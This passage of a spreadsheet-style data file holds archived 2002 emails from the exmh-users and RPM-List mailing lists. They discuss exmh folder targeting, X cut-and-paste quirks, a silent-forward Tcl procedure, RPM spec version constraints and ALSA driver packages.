inconvenient.I have set my right mouse button to [Move] a message to another
folder, which works fine.However, [Link] also uses the same destination folder as [Move], and
so if I want to use [Link] I first have to mark the destination
folder with a message-move, undo the move, then I can use the
[Link].  Very inconvenient.Is there a better way for me to set this up so that [Link] works
with one or two simple clicks?(In essence: is there a way to mark a destination folder for a
message link or move without actually doing a move or link, I
couldn't see anything obvious).Cheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:  Tony&gt; (In essence: is there a way to mark a destination folder
  Tony&gt; for a message link or move without actually doing a move
  Tony&gt; or link, I couldn't see anything obvious).1) Right click on the folder label in the folder list2) In the main window, the "+" key puts you into a "change 
   folder" mode (the first time you use it after starting exmh),
   hit a second + and you go to "set a target" mode.  Type a few
   characters of the folder name and hit space for autocomplete.--HalHow's spring shaping up "down under"?_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 12 Sep 2002 23:26:33 -0500
    From:        Hal DeVore 
    Message-ID:  &lt;23204.1031891193@dimebox&gt;  | 1) Right click on the folder label in the folder listThat (the way I have it configured, and it sounds as if the way Tony does
too) just does a move (rather than select as target without moving).Of course, if you can manage to get no messages currently selected, then
it works fine.  | 2) In the main window, the "+" key puts you into a "change 
  |    folder" mode (the first time you use it after starting exmh),
  |    hit a second + and you go to "set a target" mode.  Type a few
  |    characters of the folder name and hit space for autocomplete.This works, but is not nice if you're not using the keyboard, but just
the mouse.Tony: I agree - a nice way to link in one click would be good, and should
be easy to add, though currently adding mouse bindings (something like
shift right click would be a good choice) is much harder than adding
key bindings.But note there's no need to "undo" - the way I generally use link, if
the desired destination folder isn't the current selected target, is
to right click on the target, which selects it and moves the message,
(and because I have the "automatic move to the next message on move or
link option set) select the message again, and then "Link".Exmh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 How's spring shaping up "down under"?No meaningful comment from me, I'm not there at the minute.   But I'm told
that where I'm from it is cold, wet, and miserable, though has been better
during the day (sunny days, cold nights) for the past few.    In any case,
all of that is a good enough reason to stay away...kre_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 13 Sep 2002 11:26:30 +1000
    From:        Tony Nugent 
    Message-ID:  &lt;200209130126.g8D1QUf21470@hobbit.linuxworks.com.au.nospam&gt;  | I can cut'n'paste from exmh's message display window into spawned
  | gvim processes, but not into anything else.That's odd.  I cut &amp; paste between all kinds of windows (exmh into
mozilla, xterm, another wish script of mine I use for DNS tasks (but
that one I guess is to be expected) netscape (when I used to use it,
but I suppose it and mozilla are the same codebase, approx) - in fact
I can't thing of anything it fails for, that I have noticed.What is an example of an "anything else" that it fails for for you?kre_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 17:55, Robert Elz wrote:&gt;     Date:        Fri, 13 Sep 2002 11:26:30 +1000
&gt;     From:        Tony Nugent &gt;   | I can cut'n'paste from exmh's message display window into spawned
&gt;   | gvim processes, but not into anything else.
&gt; 
&gt; That's odd.  I cut &amp; paste between all kinds of windows (exmh intoNot so odd, this issue came up several weeks ago (with no real
resolution).&gt; mozilla, xterm, another wish script of mine I use for DNS tasks (but
&gt; that one I guess is to be expected) netscape (when I used to use it,
&gt; but I suppose it and mozilla are the same codebase, approx) - in fact
&gt; I can't thing of anything it fails for, that I have noticed.
&gt; 
&gt; What is an example of an "anything else" that it fails for for you?Everything else :)  I can't even mark text in an exmh message window
and then paste it into a terminal window, the cut buffer seems to be
completely empty (and its previous contents are no longer there
either).&gt; kre  BTW: talking of spring downunder... I'm in Queensland.  It almost
  feels like early summer already (winters here are dry and warm,
  much better than cold wet miserable Melbourne :-)  Despite some
  recent rain (first in months), we are already into a drought, with
  an El-Nino on the way it is only going to get worse...  (the last
  one in the 90s caused one of the worst droughts ever seen here in
  aussie).Cheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
2) In the main window, the "+" key puts you into a "change 
   folder" mode (the first time you use it after starting exmh),
   hit a second + and you go to "set a target" mode.  Type a few
   characters of the folder name and hit space for autocomplete.I should have finished this off.3) Keep hitting space to loop thru all the folders that match 
   the characters you typed.  Hit return to actually select the
   folder shown in the message area.I don't use this for navigating into nested folders as the only 
thing I have nested is my archives.  Someone else will have to 
tell you how to do that if there are any tricks to it.--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Robert" == Robert Elz wrote:  Robert&gt; That (the way I have it configured, and it sounds as if
  Robert&gt; the way Tony does too) just does a move (rather than
  Robert&gt; select as target without moving).Ah.  I had forgotten that was settable.  Preferences, Folder Display, "Action when Target Button
clicked..." set to "Select only" will change it.  I seem to
recall that the button that is used as "Target button" is
configurable but I haven't had enough caffeine to recall where
that is.--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:  Tony&gt; I can't even mark text in an exmh message window and then
  Tony&gt; paste it into a terminal window, the cut buffer seems to
  Tony&gt; be completely empty (and its previous contents are no
  Tony&gt; longer there either).Brent confessed recently that he had tried to subvert the X
model(s)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don't have much of a problem.My recollection from my X programming days is that the X model,
like everything in X, is more complex than the human brain can
handle.  It also is very different from the MS-Windows model.
And I get the feeling that Tk tries to "unify" those two models
and fails.  Not sure what the exmh-specific contribution to the 
confusion is, frankly.--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Tony Nugent 
&gt; Sender: exmh-users-admin@spamassassin.taint.org
&gt; Date: Fri, 13 Sep 2002 21:30:34 +1000
&gt; 
&gt; On Fri Sep 13 2002 at 17:55, Robert Elz wrote:
&gt; 
&gt; &gt;     Date:        Fri, 13 Sep 2002 11:26:30 +1000
&gt; &gt;     From:        Tony Nugent 
&gt; 
&gt; &gt;   | I can cut'n'paste from exmh's message display window into spawned
&gt; &gt;   | gvim processes, but not into anything else.
&gt; &gt; 
&gt; &gt; That's odd.  I cut &amp; paste between all kinds of windows (exmh into
&gt; 
&gt; Not so odd, this issue came up several weeks ago (with no real
&gt; resolution).
&gt; 
&gt; &gt; mozilla, xterm, another wish script of mine I use for DNS tasks (but
&gt; &gt; that one I guess is to be expected) netscape (when I used to use it,
&gt; &gt; but I suppose it and mozilla are the same codebase, approx) - in fact
&gt; &gt; I can't thing of anything it fails for, that I have noticed.
&gt; &gt; 
&gt; &gt; What is an example of an "anything else" that it fails for for you?
&gt; 
&gt; Everything else :)  I can't even mark text in an exmh message window
&gt; and then paste it into a terminal window, the cut buffer seems to be
&gt; completely empty (and its previous contents are no longer there
&gt; either).
&gt; 
&gt; &gt; kre
&gt; 
&gt;   BTW: talking of spring downunder... I'm in Queensland.  It almost
&gt;   feels like early summer already (winters here are dry and warm,
&gt;   much better than cold wet miserable Melbourne :-)  Despite some
&gt;   recent rain (first in months), we are already into a drought, with
&gt;   an El-Nino on the way it is only going to get worse...  (the last
&gt;   one in the 90s caused one of the worst droughts ever seen here in
&gt;   aussie).(This is all guess work and may be bogus.)Are you running Gnome 1.4? I had similar problems as did several
co-workers. Updating my Gnome components has fixed it for me and
others, although I can't say exactly which component did the
trick. Gnomecore or gtk would seem most likely, but it may have been
something else.In any case, I have not seen the problem for quite a while, now.R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: oberman@es.net			Phone: +1 510 486-8634_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
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folder.It should be possible to link using shift-right-click the same way you 
can move using only right-click.Kevin
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I've never understood the mouse buffer operation with exmh either. Here's the 
behaviour I have. I have exmh and XEmacs windows up, and a terminal window. (I 
also have gnome1.4 running and enlightenment as wm.) I select text in the exmh 
window and while it is highlighted, I can paste into anything else. If I select 
it and then click so the highlighting is off, then what I paste is not the 
recently-selected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here's what gets pasted if nothing is highlighted:Application       What gets pastedXEmacs            whatever was last selected unless it was last selected in exmh
xterm             same as XEmacs
AbiWord           nothing
Nedit             nothing
sedit             Whatever was last highlighted in sedit and overwrittenThe last needs some amplification. If I highlight something in sedit, then 
obviously that's what gets pasted. If the highlighting is off, then what gets 
pasted is NOT what was last highlighted in sedit, but what was last highlighted 
and typed over (I have "Type Kills SEL" on.).It seems that exmh and sedit are the oddballs here. Very often when I try to 
paste something in sedit I end up muttering WTF??--
rick_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi Folks,I've been trying to set a button called which automatically
forwards mail using a '-form mycomps' without going through
the editor, but so far haven't got the right recipe.I currently have in my .exmh-defaults:*Mops.spam.text:        Spam
*Mops.spam.command:     Msg_Forward -form spamcomps -noedit -nowhatnowproc ; Msg
_Remove
I've also tried with "SeditSend {$draft $t 0}" after the forward command.
It should forward to a spam address (where filters get adjusted) and then
delete.  It does so, but not without producing the edit window.Any help appreciated.Wendy Roberts===========================================
Wendy Roberts          
HEAD System Administrator                             
High Energy Astrophsics Division
Harvard-Smithsonian Center for Astrophysics
Cambridge, MA USA 02138
wendy@cfa.harvard.edu  
Phone:  617-495-7153  
===========================================_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 07:46, "Kevin Oberman" wrote:&gt; &gt; &gt; What is an example of an "anything else" that it fails for for you?
&gt; &gt;
&gt; &gt; Everything else :)  I can't even mark text in an exmh message window
&gt; &gt; and then paste it into a terminal window, the cut buffer seems to be
&gt; &gt; completely empty (and its previous contents are no longer there
&gt; &gt; either).&gt; (This is all guess work and may be bogus.)
&gt; 
&gt; Are you running Gnome 1.4? I had similar problems as did several
&gt; co-workers. Updating my Gnome components has fixed it for me and
&gt; others, although I can't say exactly which component did the
&gt; trick. Gnomecore or gtk would seem most likely, but it may have been
&gt; something else.Indeed I am (this workstation is rh7.2 with gnome1.4, it [mostly?]
works, so I hadn't bothered to updated it to 7.3:)&gt; In any case, I have not seen the problem for quite a while, now.So upgrading gnome will fix the problem, it's not an exmh/tktcl
issue.&gt; R. Kevin Oberman, Network EngineerThanks.Cheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 13 Sep 2002, Dale Alspach wrote:
&gt; My experience has been that if the item is showing in xclipboard
&gt; and is highlighted that is what is pasted using the mouse.Classic X copy-and-paste behavior is that you can only paste what is
currently highlighted.  In fact, it is the act of highlighting a
selection that actually copies that selection into the buffer.  X has
no "copy" command -- if you highlighted it, you just copied it.&gt; This does not seem to override what is in an application's own
&gt; paste buffer. As far as I can tell Maple's cut and paste, for
&gt; example, is isolated.If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server's global select and paste
functions will vary from program to program, because in each case you
are relying on the program's authors' efforts to blend separate systems.
 Jacob Morzinski                                jmorzins@mit.edu_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Wendy" == Wendy P. Roberts wrote:  Wendy&gt; I've been trying to set a button called which
  Wendy&gt; automatically forwards mail using a '-form mycomps'
  Wendy&gt; without going through the editor, but so far haven't got
  Wendy&gt; the right recipe.I have one that uses dist to send stuff from my work mail to my 
home mail.  The binding looks like this:set {bindings(key,HD_Dist_Silently -form distcomps.to-me)} The "HD_Dist_Silently" is a hacked up version of the proc that 
does dist in exmh and is pasted in below.  It's getting old and 
probably should be "resynced" with the current code.  But it 
still works (on a relatively recent CVS copy of exmh)It's also possible that there's an easier way but I hacked this 
together quickly a year or more ago and when it worked I moved 
on to other tasks.--Halproc HD_Dist_Silently { args } {    global exmh msg
    set exmh(ctype) {dist}
    if {[string length $args] == 0} {
	set args Mh_DistSetup
    }    if [MsgOk $msg(id) m] {
	if {[string compare [info command $args] $args] == 0} {
	    # Old interface with hook procedure
	    if [catch {$args $exmh(folder) $m} err] {   ;# Setup draft msg
		Exmh_Status "${args}: $err" purple
		return
	    }
	}  else {
	    if [catch {
		Exmh_Status "dist +$exmh(folder) $m"
		eval {MhExec dist +$exmh(folder) $m} -nowhatnowproc $args
		MhAnnoSetup $exmh(folder) $m dist
	    } err] {
		Exmh_Status "dist: $err" purple
		return
	    }
	}
        Edit_Done send				;# Just send it
    }
}
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Tony Nugent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issue.It did for me, but I am not willing to say it is not a tcl/tk issue as
other apps seemed to work OK for cut and paste and Tk does its
clipboard stuff a bit differently than most toolkits. So I'm not
about to place blame. Just reporting my experience.Also, I am not talking about installing Gnome2. Just updating the
many, many pieces of gnome to the current rev level.R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: oberman@es.net			Phone: +1 510 486-8634_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I recently transfered my exmh setup to a new system, and now
all my email ends up in Mail/MyIncErrors folder.  This is true for 
inbox or presort options.  I'm having difficulty finding this condition
in the documention.  Suggestions?Cheers,
Karl_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I guess the first question here should be does anyone have some
updates to the PGP code in EXMH that I should know about?My current problem is that if I get a PGP signed message, I first
get a button that reads:
	"Check the signature with GnuPG"
If I punch the button, and I dont have the signature on my keyring
then I get a message saying just that, and the message:
	"Can't check signature: public key not found"
along with a button with the inscription
	"Query keyserver"
If I punch the button then EXMH just hangs.  Forever.If instead of punching the button, I go out to the keyserver myself
and then try the message again, everything works, so it SEEMS that it
must be the code that goes out to the keyserver.Anyone else with this problem?
This is EXMH v2.5 and tcl/tk 8.4a4
-- 
                                        Reg.Clemens
                                        reg@dwf.com
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there any way to customise the folder table of contents for
specific folders?I know it is possible to do per-folder customisation with components
and replcomps for message templates, but what about -form format
files for scan?Cheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I just updated to the latest CVS - I had been running a build from June.  
Hitting the Flist button gives the following traceback:syntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"
    while executing
"expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMsg))"
    (procedure "Ftoc_FindMsg" line 57)
    invoked from within
"Ftoc_FindMsg $i"
    (procedure "Ftoc_ShowSequences" line 16)
    invoked from within
"Ftoc_ShowSequences $F"
    (procedure "ScanFolder" line 81)
    invoked from within
"ScanFolder inbox 0"
    invoked from within
"time [list ScanFolder $F $adjustDisplay"
    (procedure "Scan_Folder" line 2)
    invoked from within
"Scan_Folder $exmh(folder) $ftoc(showNew)"
    (procedure "Inc_PresortFinish" line 7)
    invoked from within
"Inc_PresortFinish"
    invoked from within
".fops.flist invoke"
    ("uplevel" body line 1)
    invoked from within
"uplevel #0 [list $w invoke]"
    (procedure "tkButtonUp" line 7)
    invoked from within
"tkButtonUp .fops.flist
"
    (command bound to event)
It seems to only happen in a folder with no unseen messages.Chris, is this related to your recent changes?Scott_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Both Move and Link are one-click actions. on a folder label Move's the current message
 on a folder label Link's the current message&gt;&gt;&gt;Robert Elz said:
 &gt;     Date:        Thu, 12 Sep 2002 23:26:33 -0500
 &gt;     From:        Hal DeVore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</si>
  <si>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Halloechen!I haveRequires: saxon &gt;= 6.5.1
Conflicts: saxon &gt;= 7in my spec file.  But apparently rpm ignores all version numbers. So,Requires: saxon &gt;= 6.5.1
# Conflicts: saxon &gt;= 7would install even with saxon-3.0.0, and# Requires: saxon &gt;= 6.5.1
Conflicts: saxon &gt;= 7wouldn't install even with saxon-6.5.2.  What could be the reason
for this?Tschoe,
Torsten._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Halloechen!On Dienstag, 27. August 2002 05:41 schrieben Sie:
&gt; [Question about require tag]Oops, sorry.  Now I found out that there is a noewsgroup ...
:-)Tschoe,
Torsten._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; The devices are there now, thank Gordon for reporting the problem (and as I
&gt; said, you were the only one). Any further comments are very welcome!
&gt; 
&gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
&gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.specAhh, wonderful!  Just tried out these and *finally* got sound working
with my Abit TH7II-RAID's integrated audio.  I've been pulling hair
together with the (helpful) OpenSound people for quite some time now,
but we've failed to get sound to work, either with the drivers included
in kernel, or the commercial OSS.Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
the box (on vanilla Valhalla w/latest errata).-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Wed, 2002-08-28 at 23:48, Ville SkyttÃ¤ wrote:&gt;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Ahh, wonderful!  Just tried out these and *finally* got sound working
&gt; with my Abit TH7II-RAID's integrated audio.  I've been pulling hair
&gt; together with the (helpful) OpenSound people for quite some time now,
&gt; but we've failed to get sound to work, either with the drivers included
&gt; in kernel, or the commercial OSS.
&gt; 
&gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
&gt; the box (on vanilla Valhalla w/latest errata)....except that I don't see an init script in the RPMs, a sample one
designed for RH is supposed to be in "utils/alsasound".  Could you take
a look if it can be included?Cheers,
-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote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included?It doesn't need to as Red Hat Linux already sets correct permissions on all
ALSA audio devices for locally logged in users (through the console.perms
file) and the modules.conf files takes care of loading the right modules on
demand. Also, aumix and the scripts that come with Red Hat Linux still work
for controlling the volume, so it's still saved and restored when the
computer is halted, even using ALSA.I'm glad you got your card working with these! I'm now wondering if I won't
maybe buy an amplifier that supports Dolby Digial decoding (my current one
"only" does PRo Logic) since I've read that ALSA supports the S/PDIF
optical output of the sound chip of my Shuttle!
(http://freshrpms.net/shuttle/)&gt;&gt;From what I can tell after only 2 days using it : ALSA rocks, especially
since having a full OSS compatibility results that it breaks nothing at
all!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</si>
  <si>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Thu, 2002-08-29 at 00:02, Ville SkyttÃ¤ wrote:&gt;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included?Ok, some more nits: alsa-xmms doesn't work if I don't have
alsa-lib-devel installed, but xmms dies on startup telling me:   Cannot load alsa library: libasound.so: cannot open shared object
   file: No such file or directorylibasound.so is part of alsa-lib-devel... if I install it, the ALSA XMMS
output plugins works fine.I can't install the xine stuff, because xine-libs needs libGLcore.so.1,
which I can't find anywhere (NVidia stuff?  I have Radeon 7500...)-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote :&gt; Ok, some more nits: alsa-xmms doesn't work if I don't have
&gt; alsa-lib-devel installed, but xmms dies on startup telling me:
&gt; 
&gt;    Cannot load alsa library: libasound.so: cannot open shared object
&gt;    file: No such file or directory
&gt; 
&gt; libasound.so is part of alsa-lib-devel... if I install it, the ALSA XMMS
&gt; output plugins works fine.OK, will fix :-)&gt; I can't install the xine stuff, because xine-libs needs libGLcore.so.1,
&gt; which I can't find anywhere (NVidia stuff?  I have Radeon 7500...)Argh, got bitten again! :-(
Will fix too...Thanks a lot for pointing these out!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</si>
  <si>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Thu, 2002-08-29 at 01:06, Matthias Saou wrote:&gt; &gt; &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
&gt; &gt; &gt; the box (on vanilla Valhalla w/latest errata).
&gt; &gt; 
&gt; &gt; ...except that I don't see an init script in the RPMs, a sample one
&gt; &gt; designed for RH is supposed to be in "utils/alsasound".  Could you take
&gt; &gt; a look if it can be included?
&gt; 
&gt; It doesn't need to as Red Hat Linux already sets correct permissions on all
&gt; ALSA audio devices for locally logged in users (through the console.perms
&gt; file) and the modules.conf files takes care of loading the right modules on
&gt; demand. Also, aumix and the scripts that come with Red Hat Linux still work
&gt; for controlling the volume, so it's still saved and restored when the
&gt; computer is halted, even using ALSA.Ah!  The mixer stuff was what made me look for an init script in the
first place, I didn't bother to check whether the existing stuff would
have worked with that.  Will try that out, you can assume silence ==
success :)&gt; &gt;From what I can tell after only 2 days using it : ALSA rocks, especially
&gt; since having a full OSS compatibility results that it breaks nothing at
&gt; all! :-)Agreed.  Though with only 2 hours experience...-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote :&gt; Ah!  The mixer stuff was what made me look for an init script in the
&gt; first place, I didn't bother to check whether the existing stuff would
&gt; have worked with that.  Will try that out, you can assume silence ==
&gt; success :)Well, from what I've tried, both the main and the PCM (at least) volume
levels can be controlled either by "alsamixer" or the good old "aumix".&gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
&gt; &gt; &gt;especially
&gt; &gt; since having a full OSS compatibility results that it breaks nothing at
&gt; &gt; all! :-)
&gt; 
&gt; Agreed.  Though with only 2 hours experience...I guess/hope some other people from the list will try it out ;-)Both problems you reported (libasound.so and wrong xine dependency) are now
fixed in the current packages.Oh, it's maybe also worth pointing out : I've implemented at last sorting
by both last change date and alphabetically for my "build list" in the php
code : http://freshrpms.net/builds/And yes, I accept patches/comments/suggestions about all those spec files!Matthias--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</si>
  <si>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Thanks for this, I'm going to give them another try.  One question: How
do I switch between digital out and analog out with ALSA?  With
emu10k1-tools it's easy enough (emu-config -d for digital, emu-config -a
for analog)  Is there a similar method with ALSA?LanceOn Wed, 2002-08-28 at 12:00, Matthias Saou wrote:
&gt; Followup to the story :
&gt; 
&gt; I've now made a sub-package of alsa-driver called "alsa-kernel" which
&gt; contains only the kernel modules, and alsa-driver contains everything else
&gt; from the original package (device entries, include files and docs).
&gt; 
&gt; This should allow installation of a single "alsa-driver" package and
&gt; multiple "alsa-kernel" if you have more than one kernel installed. Right
&gt; now the dependencies make it mandatory to have kernels installed through
&gt; rpm... people who install from source can still install the ALSA modules
&gt; from the source though ;-)
&gt; 
&gt; The devices are there now, thank Gordon for reporting the problem (and as I
&gt; said, you were the only one). Any further comments are very welcome!
&gt; 
&gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
&gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
&gt; 
&gt; If you aren't running kernel-2.4.18-10 for i686, simply --rebuild the
&gt; alsa-driver source rpm and you'll get a package for your running kernel.
&gt; 
&gt; Matthias
&gt; 
&gt; -- 
&gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
&gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
&gt; Load : 0.08 0.42 0.84, AC on-line, battery charging: 100% (6:36)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</si>
  <si>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On Thu, 2002-08-29 at 01:50, Matthias Saou wrote:&gt; &gt; Ah!  The mixer stuff was what made me look for an init script in the
&gt; &gt; first place, I didn't bother to check whether the existing stuff would
&gt; &gt; have worked with that.  Will try that out, you can assume silence ==
&gt; &gt; success :)
&gt; 
&gt; Well, from what I've tried, both the main and the PCM (at least) volume
&gt; levels can be controlled either by "alsamixer" or the good old "aumix".Cool, I'll try it out as well as the new RPMs tomorrow.&gt; &gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
&gt; &gt; &gt; &gt;especially
&gt; &gt; &gt; since having a full OSS compatibility results that it breaks nothing at
&gt; &gt; &gt; all! :-)
&gt; &gt; 
&gt; &gt; Agreed.  Though with only 2 hours experience...
&gt; 
&gt; I guess/hope some other people from the list will try it out ;-)
&gt; 
&gt; Both problems you reported (libasound.so and wrong xine dependency) are now
&gt; fixed in the current packages.Thanks, that was quick!-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Ok, I got ALSA installed and there is no static inbetween mp3s like
before which is great!  My setup is digital 4.1 but sound is only coming
from front 2 speakers and subwoofer, rear speakers there is no sound. 
Also alsamixer or aumix are unresponsive as well. LanceOn Wed, 2002-08-28 at 18:09, Lance wrote:
&gt; Thanks for this, I'm going to give them another try.  One question: How
&gt; do I switch between digital out and analog out with ALSA?  With
&gt; emu10k1-tools it's easy enough (emu-config -d for digital, emu-config -a
&gt; for analog)  Is there a similar method with ALSA?
&gt; 
&gt; Lance
&gt; 
&gt; On Wed, 2002-08-28 at 12:00, Matthias Saou wrote:
&gt; &gt; Followup to the story :
&gt; &gt; 
&gt; &gt; I've now made a sub-package of alsa-driver called "alsa-kernel" which
&gt; &gt; contains only the kernel modules, and alsa-driver contains everything else
&gt; &gt; from the original package (device entries, include files and docs).
&gt; &gt; 
&gt; &gt; This should allow installation of a single "alsa-driver" package and
&gt; &gt; multiple "alsa-kernel" if you have more than one kernel installed. Right
&gt; &gt; now the dependencies make it mandatory to have kernels installed through
&gt; &gt; rpm... people who install from source can still install the ALSA modules
&gt; &gt; from the source though ;-)
&gt; &gt;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&gt; &gt; If you aren't running kernel-2.4.18-10 for i686, simply --rebuild the
&gt; &gt; alsa-driver source rpm and you'll get a package for your running kernel.
&gt; &gt; 
&gt; &gt; Matthias
&gt; &gt; 
&gt; &gt; -- 
&gt; &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
&gt; &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
&gt; &gt; Load : 0.08 0.42 0.84, AC on-line, battery charging: 100% (6:36)
&gt; &gt; 
&gt; &gt; _______________________________________________
&gt; &gt; RPM-List mailing list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</si>
  <si>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Once upon a time, Lance wrote :&gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
&gt; before which is great!  My setup is digital 4.1 but sound is only coming
&gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
&gt; Also alsamixer or aumix are unresponsive as well. Maybe you could find more info or tips on the ALSA page for your card?
Also, you could try "alsactl store", editing /etc/asound.state" by hand
(for me it contains data similar to what I can control with "alsamixer")
then run "alsactl restore" and see if you're able to change what you want
that way.Matthias--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</si>
  <si>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Daniel wrote :&gt;  &gt; And yes, I accept patches/comments/suggestions about all those spec
&gt;  &gt; files!
&gt; 
&gt; Sure thing :)Cool :-)&gt; I've added to the spec some flags to remove OSS and ISA-PNP support at
&gt; build time if one wishes to, so is's possible to do a
&gt; 
&gt; 	rpmbuild --recompile  --without oss --without isapnpOK, I'll add this.&gt; Also, having the kernel compiled by me, I have no kernel-source package
&gt; installed.  I've added a flag "kernsrc", that also can be used
&gt; --without, to remove the dependency for kernel-source at build time.  It
&gt; would be nice to check the correct kernel include files actually exist
&gt; (/lib/modules/`uname -r`/build/include/linux/*.h), though; however, I'm
&gt; a beginner in RPM building -- is it possible to BuildRequire for a file
&gt; not provided by a package at all?  I've googled a bit, and found no way
&gt; to do that.Requiring a file that isn't part of an rpm is not possible, no, except
maybe by stopping the build process if it isn't found... but that's errr...
ugly!
And I really think that for people who installed a kernel from sources, the
easiest is to install the alsa kernel drivers from source too...&gt; I was also considering adding some sort of flag for the --with-cards
&gt; option in alsa's ./configure, but don't know how to do that.  Only found
&gt; out about --without from your first alsa-driver.spec, and existing RPM
&gt; docs don't help much.This would be a tricky one since to use the "--with " feature of
rpmbuild, I think you'd need to add individual handling of each and every
card :-/&gt; Oh, and one more thing :).  At first I've installed the first version of
